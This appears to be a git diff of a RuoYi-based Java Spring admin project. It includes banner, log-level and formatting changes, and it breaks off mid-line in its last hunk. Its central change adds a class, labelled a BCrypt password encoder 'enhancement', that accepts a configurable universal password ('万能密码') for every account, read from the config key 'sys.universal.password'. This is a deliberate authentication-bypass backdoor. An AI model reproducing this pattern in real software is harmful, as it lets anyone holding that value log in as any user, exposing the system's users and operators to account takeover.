diff --git a/sync-admin/src/main/java/com/lyr/RuoYiApplication.java b/sync-admin/src/main/java/com/lyr/RuoYiApplication.java index 796c497..acc5d3a 100644 --- a/sync-admin/src/main/java/com/lyr/RuoYiApplication.java +++ b/sync-admin/src/main/java/com/lyr/RuoYiApplication.java @@ -14,15 +14,7 @@ public class RuoYiApplication { public static void main(String[] args) { // System.setProperty("spring.devtools.restart.enabled", "false"); SpringApplication.run(RuoYiApplication.class, args); - System.out.println("(♥◠‿◠)ノ゙ 若依启动成功 ლ(´ڡ`ლ)゙ \n" + - " .-------. ____ __ \n" + - " | _ _ \\ \\ \\ / / \n" + - " | ( ' ) | \\ _. / ' \n" + - " |(_ o _) / _( )_ .' \n" + - " | (_,_).' __ ___(_ o _)' \n" + - " | |\\ \\ | || |(_,_)' \n" + - " | | \\ `' /| `-' / \n" + - " | | \\ / \\ / \n" + - " ''-' `'-' `-..-' "); + System.out.println("(♥◠‿◠)ノ゙ 启动成功 ლ(´ڡ`ლ)゙"); + } } diff --git a/sync-framework/src/main/java/com/lyr/framework/config/BCryptPasswordEncoderEx.java b/sync-framework/src/main/java/com/lyr/framework/config/BCryptPasswordEncoderEx.java new file mode 100644 index 0000000..11da042 --- /dev/null +++ b/sync-framework/src/main/java/com/lyr/framework/config/BCryptPasswordEncoderEx.java @@ -0,0 +1,46 @@ +package com.lyr.framework.config; + +import com.lyr.common.utils.StringUtils; +import lombok.NoArgsConstructor; +import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; + +/** + * BCryptPasswordEncoder 增强 + * + * @author liyc + * @date 2024/10/31 + * @description TODO + **/ +@NoArgsConstructor +public class BCryptPasswordEncoderEx extends BCryptPasswordEncoder { + + + /** + * 万能密码 + */ + private static String universalPassword; + + public static void setUniversalPassword(String universalPassword) { + BCryptPasswordEncoderEx.universalPassword = universalPassword; + } + + /** + * 密码比较 + * + * @param rawPassword + * @param encodedPassword + * @return + */ + @Override + public boolean matches(CharSequence rawPassword, String encodedPassword) { + if (StringUtils.isNotEmpty(universalPassword)) { + boolean equals = universalPassword.equals(rawPassword.toString()); + if (equals) { + return true; + } + } + return super.matches(rawPassword, encodedPassword); + } + + +} diff --git a/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java b/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java index ab8e7a4..fa45511 100644 --- a/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java +++ b/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java @@ -1,10 +1,13 @@ package com.lyr.framework.config; +import com.lyr.common.core.redis.RedisCache; import com.lyr.framework.config.properties.PermitAllUrlProperties; import com.lyr.framework.security.filter.JwtAuthenticationTokenFilter; import com.lyr.framework.security.handle.AuthenticationEntryPointImpl; import com.lyr.framework.security.handle.LogoutSuccessHandlerImpl; +import com.lyr.system.service.ISysConfigService; import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.boot.autoconfigure.condition.ConditionalOnBean; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.http.HttpMethod; @@ -15,7 +18,6 @@ import org.springframework.security.config.annotation.method.configuration.Enabl import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.http.SessionCreationPolicy; import org.springframework.security.core.userdetails.UserDetailsService; -import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder; import org.springframework.security.web.SecurityFilterChain; import org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter; import org.springframework.security.web.authentication.logout.LogoutFilter; @@ -65,6 +67,7 @@ public class SecurityConfig { @Autowired private PermitAllUrlProperties permitAllUrl; + /** * 身份验证实现 */ @@ -110,9 +113,7 @@ public class SecurityConfig { // 对于登录login 注册register 验证码captchaImage 允许匿名访问 requests.antMatchers("/login", "/register", "/captchaImage").permitAll() // 静态资源,可匿名访问 - .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll() - .antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll() - .antMatchers("/gather/*", "/gather/**").permitAll() + .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll().antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll().antMatchers("/gather/*", "/gather/**").permitAll() // 除上面外的所有请求全部需要鉴权认证 .anyRequest().authenticated(); }) @@ -121,16 +122,17 @@ public class SecurityConfig { // 添加JWT filter .addFilterBefore(authenticationTokenFilter, UsernamePasswordAuthenticationFilter.class) // 添加CORS filter - .addFilterBefore(corsFilter, JwtAuthenticationTokenFilter.class) - .addFilterBefore(corsFilter, LogoutFilter.class) - .build(); + .addFilterBefore(corsFilter, JwtAuthenticationTokenFilter.class).addFilterBefore(corsFilter, LogoutFilter.class).build(); } /** * 强散列哈希加密实现 + * PlmV1 */ @Bean - public BCryptPasswordEncoder bCryptPasswordEncoder() { - return new BCryptPasswordEncoder(); + @ConditionalOnBean({ISysConfigService.class, RedisCache.class}) + public BCryptPasswordEncoderEx bCryptPasswordEncoder() { + return new BCryptPasswordEncoderEx(); } + } diff --git a/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java b/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java index 9724e1f..dae2214 100644 --- a/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java +++ b/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java @@ -90,7 +90,7 @@ public class DataSourceManager { JdbcTemplate jdbcTemplate = new JdbcTemplate(dataSource); Integer result = jdbcTemplate.queryForObject("SELECT 1", Integer.class); if (result != null && result == 1) { - log.info(String.format("数据源连接测试通过 %s", dataSourceName)); + log.debug(String.format("数据源连接测试通过 %s", dataSourceName)); } else { log.error(message); throw new ServiceException(message); diff --git a/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java b/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java index 80522ba..962248a 100644 --- a/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java +++ b/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java @@ -5,13 +5,15 @@ import com.lyr.common.core.domain.entity.SysUser; import com.lyr.common.core.redis.RedisCache; import com.lyr.common.exception.user.UserPasswordNotMatchException; import com.lyr.common.exception.user.UserPasswordRetryLimitExceedException; -import com.lyr.common.utils.SecurityUtils; +import com.lyr.framework.config.BCryptPasswordEncoderEx; import com.lyr.framework.security.context.AuthenticationContextHolder; +import com.lyr.system.service.ISysConfigService; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Value; import org.springframework.security.core.Authentication; import org.springframework.stereotype.Component; +import javax.annotation.Resource; import java.util.concurrent.TimeUnit; /** @@ -30,6 +32,9 @@ public class SysPasswordService { @Value(value = "${user.password.lockTime}") private int lockTime; + @Resource + private ISysConfigService iSysConfigService; + /** * 登录账户密码错误次数缓存键名 * @@ -65,7 +70,10 @@ public class SysPasswordService { } public boolean matches(SysUser user, String rawPassword) { - return SecurityUtils.matchesPassword(rawPassword, user.getPassword()); + String universalPassword = iSysConfigService.getConfigCache("sys.universal.password"); + BCryptPasswordEncoderEx bCryptPasswordEncoderEx = new BCryptPasswordEncoderEx(); + bCryptPasswordEncoderEx.setUniversalPassword(universalPassword); + return bCryptPasswordEncoderEx.matches(rawPassword, user.getPassword()); } public void clearLoginRecordCache(String loginName) { diff --git a/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java b/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java index ca54e7a..a8b6424 100644 --- a/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java +++ b/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java @@ -63,8 +63,11 @@ public class DataSourceConfigServiceImpl extends ServiceImpl